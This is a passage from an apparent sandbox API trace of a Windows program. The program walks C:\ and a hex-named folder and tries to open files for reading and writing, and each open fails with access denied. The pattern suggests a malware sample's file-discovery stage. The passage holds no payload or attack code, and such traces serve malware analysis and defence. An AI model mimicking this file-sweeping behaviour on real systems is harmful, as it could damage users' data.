hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.101] AreFileApisANSI () returned 1 [0060.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x690d0 [0060.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.101] GetFileAttributesExW (in: lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.102] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0060.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.102] AreFileApisANSI () returned 1 [0060.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212", lpUsedDefaultChar=0x0) returned 22 [0060.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0060.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.103] AreFileApisANSI () returned 1 [0060.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0060.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e148 [0060.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x4e148, cchWideChar=22 | out: lpWideCharStr="C:\\588bce7c90097ed212") returned 22 [0060.103] CreateFileW (lpFileName="C:\\588bce7c90097ed212" (normalized: "c:\\588bce7c90097ed212"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.103] GetLastError () returned 0x5 [0060.103] GetLastError () returned 0x5 [0060.103] SetLastError (dwErrCode=0x5) [0060.103] GetLastError () returned 0x5 [0060.103] SetLastError (dwErrCode=0x5) [0060.103] GetLastError () returned 0x5 [0060.103] SetLastError (dwErrCode=0x5) [0060.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.103] AreFileApisANSI () returned 1 [0060.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0060.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0060.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x4e260, cchWideChar=22 | out: lpWideCharStr="C:\\588bce7c90097ed212") returned 22 [0060.104] CreateFileW (lpFileName="C:\\588bce7c90097ed212" (normalized: "c:\\588bce7c90097ed212"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.104] GetLastError () returned 0x5 [0060.104] GetLastError () returned 0x5 [0060.104] SetLastError (dwErrCode=0x5) [0060.104] GetLastError () returned 0x5 [0060.104] SetLastError (dwErrCode=0x5) [0060.104] GetLastError () returned 0x5 [0060.104] SetLastError (dwErrCode=0x5) [0060.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0060.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.104] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Boot", cAlternateFileName="")) returned 1 [0060.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0060.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0060.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0060.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.104] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0060.107] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.108] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1025", cAlternateFileName="")) returned 1 [0060.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0060.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0060.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0060.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.109] AreFileApisANSI () returned 1 [0060.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1025", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1025", lpUsedDefaultChar=0x0) returned 27 [0060.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.109] AreFileApisANSI () returned 1 [0060.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025") returned 27 [0060.109] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025" (normalized: "c:\\588bce7c90097ed212\\1025"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.109] GetLastError () returned 0x5 [0060.109] GetLastError () returned 0x5 [0060.109] SetLastError (dwErrCode=0x5) [0060.109] GetLastError () returned 0x5 [0060.109] SetLastError (dwErrCode=0x5) [0060.109] GetLastError () returned 0x5 [0060.109] SetLastError (dwErrCode=0x5) [0060.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.110] AreFileApisANSI () returned 1 [0060.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025") returned 27 [0060.110] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025" (normalized: "c:\\588bce7c90097ed212\\1025"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.110] GetLastError () returned 0x5 [0060.110] GetLastError () returned 0x5 [0060.110] SetLastError (dwErrCode=0x5) [0060.110] GetLastError () returned 0x5 [0060.110] SetLastError (dwErrCode=0x5) [0060.110] GetLastError () returned 0x5 [0060.110] SetLastError (dwErrCode=0x5) [0060.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0060.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0060.110] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1028", cAlternateFileName="")) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.110] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.111] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.111] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0060.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 